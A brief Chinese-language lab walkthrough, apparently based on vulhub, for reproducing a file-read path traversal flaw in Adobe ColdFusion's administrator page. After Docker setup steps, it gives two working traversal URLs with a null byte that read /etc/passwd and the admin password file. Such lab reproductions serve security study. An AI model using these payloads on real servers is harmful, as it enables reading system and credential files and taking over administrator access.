Adobe ColdFusion 文件读取漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

查看开启的端口号

docker-compose ps

监听了8500端口，访问http://target_ip:8500/CFIDE/administrator/enter.cfm

默认密码为admin

0x02.漏洞复现

访问http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

读取后台管理密码http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en